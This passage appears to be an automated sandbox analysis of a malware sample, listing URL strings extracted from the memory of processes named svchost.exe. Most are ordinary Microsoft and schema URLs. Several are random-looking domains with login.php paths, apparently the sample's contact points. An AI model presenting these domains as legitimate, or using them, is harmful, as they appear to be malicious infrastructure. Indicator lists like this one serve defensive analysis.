Source: svchost.exe, 0000000E.00000002.3272924032.0000017E5C337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570505708.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 0000000E.00000002.3272924032.0000017E5C337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708710682.0000017E5C377000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3273051991.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2737884459.0000017E5C374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2544281210.0000017E5C35A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2721838801.0000017E5C375000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2551035023.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy~
Source: svchost.exe, 0000000E.00000002.3273209037.0000017E5CA00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/
Source: svchost.exe, 0000000E.00000002.3272924032.0000017E5C337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3273051991.0000017E5C376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2737884459.0000017E5C374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scAAAAA
Source: svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scrf
Source: svchost.exe, 0000000E.00000003.2570505708.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2551035023.0000017E5C30E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 0000000E.00000003.2697887745.0000017E5CABB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 0000000E.00000002.3272292196.0000017E5BAE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000000E.00000002.3272985921.0000017E5C35F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: svchost.exe, 0000000E.00000003.2570549062.0000017E5C37A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustAAAAA
Source: svchost.exe, 0000000E.00000002.3272924032.0000017E5C337000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustn
Source: svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vocyzit.com/login.php
Source: svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2839860415.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2600836832.0000000002B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2890700232.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofycot.com/login.php
Source: svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojyqem.com/login.php
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonypom.com/login.php
Source: svchost.exe, 00000002.00000003.2084959742.0000000000883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww1.lysyfyj.com
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084959742.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww1.lysyfyj.com/
Source: PSSYIN6Y.htm.2.dr	String found in binary or memory: http://ww1.lysyfyj.com/?fp=ZbSrv2i18YnNfPNSqSsC6n0jQLvcDPBy65hKrYcVeZdyOk55NkMmURDujLfYrzEMz5BE5QmQN
Source: svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww1.lysyfyj.com/t
Source: svchost.exe, 00000002.00000002.3272777331.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272499451.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188449261.0000000002B39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240824-0243-077d-8f61-d4c58a818681
Source: svchost.exe, 00000002.00000003.3203349599.00000000008F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60
Source: svchost.exe, 00000002.00000002.3272732597.0000000002B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0243-071d-8c4b-3f42cf5256c3co
Source: svchost.exe, 00000002.00000002.3275296456.000000000960C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3203448241.0000000002BA5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3271388924.0000000000886000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272732597.0000000002B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcb
Source: svchost.exe, 00000002.00000002.3272732597.0000000002B37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcbco
Source: svchost.exe, 00000002.00000002.3275296456.0000000009600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3275296456.0000000009608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0244-06be-9bcf-3aaf77f61bcbser-AgentMozilla/4.0
Source: svchost.exe, 00000002.00000002.3271285901.000000000086D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww6.galyqaz.com/
Source: svchost.exe, 00000002.00000002.3271285901.000000000086D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww6.galyqaz.com/GlobalSign
Source: roundwood.exe, svchost.exe.0.dr	String found in binary or memory: http://www.ankord.com/)2
Source: svchost.exe, 00000002.00000003.2890817974.000000000086B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gahyqah.com/
Source: svchost.exe, 00000002.00000003.2890848230.0000000002BA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gahyqah.com/login.php
Source: svchost.exe, svchost.exe, 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004421327.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2201851552.0000000002B93000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272777331.0000000002B3A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3275296456.0000000009600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2201371458.0000000002B93000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2890700232.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, svchost.exe, 00000002.00000003.2084993820.0000000002B18000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3275296456.000000000960C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3271285901.000000000086D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084959742.0000000000883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272240736.0000000002915000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3271568351.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: svchost.exe, 00000002.00000003.2905676121.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3275296456.0000000009608000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905676121.0000000002BB1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000002.00000003.2600887126.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comt3
Source: svchost.exe, 00000002.00000003.2600887126.0000000002BB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comtD
Source: svchost.exe, 00000002.00000003.2600887126.0000000002BB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comtw
Source: roundwood.exe, svchost.exe.0.dr	String found in binary or memory: http://www.symantec.com
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C32C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2439857883.0000017E5C356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2439857883.0000017E5C356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600ssuer
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570505708.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433649128.0000017E5C357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 00000002.00000003.2921538200.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: login[2].htm1.2.dr	String found in binary or memory: https://cdn.consentmanager.net
Source: login[2].htm1.2.dr	String found in binary or memory: https://delivery.consentmanager.net
Source: svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, login[2].htm0.2.dr, login[3].htm.2.dr, login[2].htm.2.dr	String found in binary or memory: https://domaincntrol.com/?orighost=
Source: svchost.exe, 00000002.00000003.2084959742.0000000000883000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: svchost.exe, 0000000E.00000003.2727419752.0000017E5CAAA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2711485737.0000017E5CAAA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2602576677.0000017E5CAAA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srfr.srf
Source: svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2439857883.0000017E5C356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2439857883.0000017E5C356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600er
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C32C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601er
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf~
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3273834815.0000017E5CAA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570505708.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425245779.0000017E5C310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000000E.00000003.2438660213.0000017E5C327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
Source: svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuer
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2438660213.0000017E5C327000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfen
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000000E.00000003.2438660213.0000017E5C327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
Source: svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfrml
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C32C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
